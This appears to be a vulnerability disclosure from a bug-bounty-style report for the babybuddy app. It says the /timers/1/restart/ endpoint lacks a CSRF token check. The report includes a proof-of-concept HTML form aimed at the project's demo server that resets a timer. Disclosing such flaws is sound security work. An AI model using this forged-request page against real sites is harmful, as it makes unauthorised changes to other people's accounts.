Cross-Site Request Forgery (CSRF) in babybuddy/babybuddy
Reported on
Jul 30th 2021
✍️ Description
You don't check CSRF token in following endpoint
/timers/1/restart/
with PoC.html
attacker able to reset timer with id equal to 1
.
🕵️♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.baby-buddy.net/timers/1/restart/">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of reset any timer.